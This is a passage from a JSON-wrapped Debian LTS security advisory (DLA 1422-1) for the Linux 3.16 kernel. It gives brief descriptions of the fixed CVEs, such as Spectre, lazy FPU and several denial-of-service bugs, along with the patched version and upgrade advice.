or UEFI firmware, or in a later update to the\n amd64-microcode package.\n\n This vulnerability was already mitigated for the x86 architecture\n by the \"retpoline\" feature.\n\nCVE-2017-5753\n\n Further instances of code that was vulnerable to Spectre variant 1\n (bounds-check bypass) have been mitigated.\n\nCVE-2018-1066\n\n Dan Aloni reported to Red Hat that the CIFS client implementation\n would dereference a null pointer if the server sent an invalid\n response during NTLMSSP setup negotiation. This could be used by a\n malicious server for denial of service.\n\n The previously applied mitigation for this issue was not\n appropriate for Linux 3.16 and has been replaced by an alternate\n fix.\n\nCVE-2018-1093\n\n Wen Xu reported that a crafted ext4 filesystem image could trigger\n an out-of-bounds read in the ext4_valid_block_bitmap() function. 
A\n local user able to mount arbitrary filesystems could use this for\n denial of service.\n\nCVE-2018-1130\n\n The syzbot software found that the DCCP implementation of\n sendmsg() does not check the socket state, potentially leading\n to a null pointer dereference. A local user could use this to\n cause a denial of service (crash). \n\nCVE-2018-3665\n\n Multiple researchers have discovered that some Intel x86\n processors can speculatively read floating-point and vector\n registers even when access to those registers is disabled. The\n Linux kernel's \"lazy FPU\" feature relies on that access control to\n avoid saving and restoring those registers for tasks that do not\n use them, and was enabled by default on x86 processors that do\n not support the XSAVEOPT instruction.\n\n If \"lazy FPU\" is enabled on one of the affected processors, an\n attacker controlling an unprivileged process may be able to read\n sensitive information from other users' processes or the kernel.\n This specifically affects processors based on the \"Nehalem\" and\n \"Westmere\" core designs.\n \n This issue has been mitigated by disabling \"lazy FPU\" by default\n on all x86 processors that support the FXSAVE and FXRSTOR\n instructions, which includes all processors known to be affected\n and most processors that perform speculative execution. It can\n also be mitigated by adding the kernel parameter: eagerfpu=on\n\nCVE-2018-5814\n\n Jakub Jirasek reported race conditions in the USB/IP host driver.\n A malicious client could use this to cause a denial of service\n (crash or memory corruption), and possibly to execute code, on a\n USB/IP server.\n\nCVE-2018-9422\n\n It was reported that the futex() system call could be used by an\n unprivileged user for privilege escalation.\n\nCVE-2018-10853\n\n Andy Lutomirski and Mika Penttil\u00e4 reported that KVM for x86\n processors did not perform a necessary privilege check when\n emulating certain instructions. 
This could be used by an\n unprivileged user in a guest VM to escalate their privileges\n within the guest.\n\nCVE-2018-10940\n\n Dan Carpenter reported that the optical disc driver (cdrom) does\n not correctly validate the parameter to the CDROM_MEDIA_CHANGED\n ioctl. A user with access to a cdrom device could use this to\n cause a denial of service (crash).\n\nCVE-2018-11506\n\n Piotr Gabriel Kosinski and Daniel Shapira reported that the\n SCSI optical disc driver (sr) did not allocate a sufficiently\n large buffer for sense data. A user with access to a SCSI\n optical disc device that can produce more than 64 bytes of\n sense data could use this to cause a denial of service (crash\n or memory corruption), and possibly for privilege escalation.\n\nCVE-2018-12233\n\n Shankara Pailoor reported that a crafted JFS filesystem image\n could trigger a denial of service (memory corruption). This\n could possibly also be used for privilege escalation.\n\nCVE-2018-1000204\n\n The syzbot software found that the SCSI generic driver (sg) would\n in some circumstances allow reading data from uninitialised\n buffers, which could include sensitive information from the kernel\n or other tasks. However, only privileged users with the\n CAP_SYS_ADMIN or CAP_SYS_RAWIO capability were allowed to do this,\n so this has little or no security impact.\n\nFor Debian 8 \"Jessie\", these problems have been fixed in version\n3.16.57-1. 
This update additionally fixes Debian bug #898165, and\nincludes many more bug fixes from stable update 3.16.57.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \nBen Hutchings - Debian developer, member of kernel, installer and LTS teams", "modified": "2018-07-14T19:32:34", "published": "2018-07-14T19:32:34", "id": "DEBIAN:DLA-1422-1:EBC6F", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201807/msg00015.html", "title": "[SECURITY] [DLA 1422-1] linux security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}